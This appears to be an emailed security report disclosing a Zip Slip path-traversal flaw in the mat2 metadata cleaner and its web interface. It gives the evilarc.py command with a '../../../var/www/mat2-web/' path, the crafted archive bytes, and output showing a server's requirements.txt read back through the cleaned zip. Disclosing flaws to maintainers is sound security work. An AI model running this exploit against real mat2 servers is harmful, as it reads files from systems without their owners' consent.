Arbitrary read via malicious zip file
[As received by email, sent by jfriedli]
Heyo
I found an issue in mat2. It is vulnerable to the Zip slip vulnerability.
Here a little summary :)
Create malicious file
Script used to create a Zip Slip file: https://github.com/ptoomey3/evilarc/blob/master/evilarc.py
python2.7 evilarc.py filename_to_extract.txt -d 0 -o "unix" -p "../../../home/kali/Documents/projects"
whereas filename_to_extract.txt is the filename of the file you want to extract from the victim system.
Note: it has to be a supported extension by mat2
mat2 evil.zip
and upon extracting the cleaned zip file you receive the file from the victim.
Example Extracting Requirements.txt From Webserver
Create empty target file we want to extract.
touch requirements.txt
We know the absolute path of the target file on the server from the Dockerfile.
python2.7 path_tra.py requirements.txt -d 0 -o "unix" -p "../../../var/www/mat2-web/"
Creating evil.zip containing ../../../var/www/mat2-web/requirements.txtCheck if if the path and filename is correct.
cat evilzip
PK�m�T*../../../var/www/mat2-web/requirements.txtPK�m�T*�t2-web/requirements.txtPKXHThen upload the file via the web interface and download the cleaned zip.
Afterward we unzip it.
unzip evil.cleaned.zip
Archive: evil.cleaned.zip
warning: skipped "../" path component(s) in ../../../var/www/mat2-web/requirements.txt
extracting: var/www/mat2-web/requirements.txtAnd we can proof that we received the content of the requirements.txt from the server.
cat var/www/mat2-web/requirements.txt
mutagen==1.45.1
ffmpeg==1.4
bubblewrap==1.2.0
mat2==0.12.4
flask==2.1.2
Flask-RESTful==0.3.9
Flask-Cors==3.0.10
Cerberus==1.3.4
Flask-Testing==0.8.1
blinker==1.4
flasgger==0.9.5
Flask-Assets==2.0